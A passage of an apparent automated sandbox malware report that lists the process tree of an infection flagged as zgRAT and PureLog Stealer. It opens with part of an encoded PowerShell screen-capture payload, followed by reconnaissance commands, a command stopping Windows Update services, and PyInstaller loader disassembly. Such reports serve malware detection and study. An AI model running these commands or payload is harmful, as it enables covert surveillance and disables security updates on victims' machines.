UAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	18:07:17
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
Imagebase:	0x7ff6563b0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	18:07:18
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
Imagebase:	0x7ff6a91f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	18:07:19
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	18:07:19
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	18:07:19
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	18:07:19
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	18:07:20
Start date:	01/08/2024
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff71e200000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	18:07:20
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
Imagebase:	0x7ff6563b0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
Imagebase:	0x7ff6a91f0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	18:07:21
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	18:07:22
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	18:07:22
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	18:07:22
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	18:07:22
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	18:07:23
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	18:07:23
Start date:	01/08/2024
Path:	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
Imagebase:	0xa50000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	18:07:23
Start date:	01/08/2024
Path:	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
Imagebase:	0x810000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	18:07:23
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	18:07:23
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	144
Start time:	18:07:42
Start date:	01/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	187
Start time:	18:08:00
Start date:	01/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	192
Start time:	18:08:01
Start date:	01/08/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00007FF7691A1000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF7691A3653
Failed to start splash screen!, xrefs: 00007FF7691A3933
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF7691A36FC
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF7691A37EF
ERROR: failed to remove temporary directory: %s, xrefs: 00007FF7691A3A12
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF7691A3905
Failed to convert DLL search path!, xrefs: 00007FF7691A38A3
pyi-disable-windowed-traceback, xrefs: 00007FF7691A361D
Could not create temporary directory!, xrefs: 00007FF7691A3838
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF7691A391A
_MEIPASS2, xrefs: 00007FF7691A36A2, 00007FF7691A36AE, 00007FF7691A39AC
MEI, xrefs: 00007FF7691A374E
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF7691A378C
WARNING: failed to remove temporary directory: %s, xrefs: 00007FF7691A3A31
pyi-contents-directory, xrefs: 00007FF7691A35F8
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF7691A3820
pyi-runtime-tmpdir, xrefs: 00007FF7691A35D3
pkg, xrefs: 00007FF7691A37CF

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
API String ID: 514040917-585287483
Opcode ID: 50fc1386d512d691390c5b157662d05eacb50b5d0978dddca11a68ca0d5b27cb
Instruction ID: bde7d7aa7b3e13d47e0e1640368fcfe0862a14d4bc14e43a798d12d16ef09090
Opcode Fuzzy Hash: 50fc1386d512d691390c5b157662d05eacb50b5d0978dddca11a68ca0d5b27cb
Instruction Fuzzy Hash: 2EF15C21B08682D1FA1DFF21B5543B9E271AF54790FE44432DA5D83AD6EF2CE95AC320

Function 00007FF7691C5C74 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C59E9
Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5A67
Part of subcall function 00007FF7691C59A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7691C5AB8

CreateFileW.KERNELBASE ref: 00007FF7691C5D7A
CreateFileW.KERNEL32 ref: 00007FF7691C5DCA
GetLastError.KERNEL32 ref: 00007FF7691C5DFA
GetFileType.KERNELBASE ref: 00007FF7691C5E0F
GetLastError.KERNEL32 ref: 00007FF7691C5E19
CloseHandle.KERNEL32 ref: 00007FF7691C5E4C
CloseHandle.KERNEL32 ref: 00007FF7691C5FAF
CreateFileW.KERNEL32 ref: 00007FF7691C5FE4
GetLastError.KERNEL32 ref: 00007FF7691C5FF3

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction ID: af3ee9bd4c262c801d871cd97e80b7e2da0c3bc77c77e1909c4ccdb5f8225516
Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
Instruction Fuzzy Hash: D9C1C132B28A45C6EB18EF68E4802BC7771FB49B98B610225DA2E977D5CF3CD051C710

Function 00007FF7691A79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A1B
RemoveDirectoryW.KERNEL32(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7A9E
DeleteFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ABD
FindNextFileW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ACB
FindClose.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7ADC
RemoveDirectoryW.KERNELBASE(?,00007FF7691A7EF9,00007FF7691A39E6), ref: 00007FF7691A7AE5

Strings

%s\*, xrefs: 00007FF7691A79E2

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction ID: 37816defd342bae652e1769586292a74f9f788f8579f940ae5ec14237c27edfe
Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
Instruction Fuzzy Hash: 46418221A0C542E5EA24BF64F4545B9A370FB94754FE40632D55E82AC8DF3CDB4ACB10

Function 00007FF7691A85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7691A85D3
FindClose.KERNELBASE ref: 00007FF7691A85E2

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction ID: 28785ceea2b0b0f30b8a138418f6573cebbaab0393ddc1dbf0bfad79a0c637e8
Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
Instruction Fuzzy Hash: B8F0C832A18681C7F7649F60B449366B3B0AB44338F944335D96E02AD4CF3CD459CA00

Function 00007FF7691BFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction ID: 25c6fc0ef89a5fc45c7967b23a9b3096af6646bfc2f1bdc2a39380a9beffebbc
Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
Instruction Fuzzy Hash: 1D02BF25A09683C1FE5DBF12B411279E2B2AF05BA0FF94639DE6D473D6DE3CA4019720

Function 00007FF7691A18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7691A76A0: _fread_nolock.LIBCMT ref: 00007FF7691A774A

_fread_nolock.LIBCMT ref: 00007FF7691A19B4

Part of subcall function 00007FF7691A2760: MessageBoxW.USER32 ref: 00007FF7691A283B

Strings

calloc, xrefs: 00007FF7691A19F5
malloc, xrefs: 00007FF7691A1AA8
fread, xrefs: 00007FF7691A19C6, 00007FF7691A1ADB
Could not allocate memory for archive structure!, xrefs: 00007FF7691A19EE
fseek, xrefs: 00007FF7691A1990
MEI, xrefs: 00007FF7691A1931
Failed to seek to cookie position!, xrefs: 00007FF7691A1989
Failed to read cookie!, xrefs: 00007FF7691A19BF
Could not read full TOC!, xrefs: 00007FF7691A1AD4
Could not allocate buffer for TOC!, xrefs: 00007FF7691A1AA1
Error on file., xrefs: 00007FF7691A1B0A

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: d6aeb8e3ca7c5b5e1cbced0a86e6549a8ab5df6ab8c5daac5096595605ddb0bc
Instruction ID: 6e817fb7fd7a4d2593f2607697d9b8ea0804b25ccb16239f813aec2121c207b8
Opcode Fuzzy Hash: d6aeb8e3ca7c5b5e1cbced0a86e6549a8ab5df6ab8c5daac5096595605ddb0bc
